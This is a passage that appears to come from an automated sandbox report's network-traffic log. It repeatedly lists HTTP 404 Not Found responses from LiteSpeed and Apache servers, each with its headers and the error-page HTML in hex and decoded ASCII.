3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Sep 2024 07:06:07 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Sep 2024 07:06:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Sep 2024 07:06:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Sep 2024 07:06:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:06:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:06:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:06:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:06:38 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:06:41 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:06:43 GMTServer: ApacheX-Xss-Protection: 1; mode=blockReferrer-Policy: no-referrer-when-downgradeX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
